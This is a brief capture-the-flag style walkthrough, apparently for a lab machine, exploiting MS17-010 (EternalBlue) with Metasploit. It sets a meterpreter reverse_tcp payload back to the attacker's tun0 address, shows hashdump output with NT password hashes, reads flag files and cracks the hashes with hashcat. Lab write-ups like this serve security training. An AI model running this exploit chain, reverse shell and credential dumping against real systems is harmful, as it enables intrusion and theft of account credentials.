# Metasploit

## Scan module

```sh
auxiliary/scanner/smb/smb_ms17_010
```
- check for MS17-010 (EternalBlue) vulnerability


## Exploit module

```sh
exploit/windows/smb/ms17_010_eternalblue
```
- exploit MS17-010 (EternalBlue) vulnerability


## Set options

```sh
set lhost tun0
set rhosts $IP
set payload windows/x64/meterpreter/reverse_tcp
```


## Meterpreter

### hashdump

```sh
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cdf51b162460b7d5bc898f493751a0cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
haris:1000:aad3b435b51404eeaad3b435b51404ee:8002bc89de91f6b52d518bde69202dc6:::
```


### shell

```bat
type C:\Users\haris\Desktop\user.txt

type C:\Users\Administrator\Desktop\root.txt
```


# Hashcat

## Extract NT hashes

```sh
python3 samDump2hashFile.py hashdump.txt
```


## Crack NT hashes

```sh
hashcat -a 0 -m 1000 ./nt.hash /usr/share/wordlists/rockyou.txt -o crackedhashes.txt -O --force --potfile-disable
```
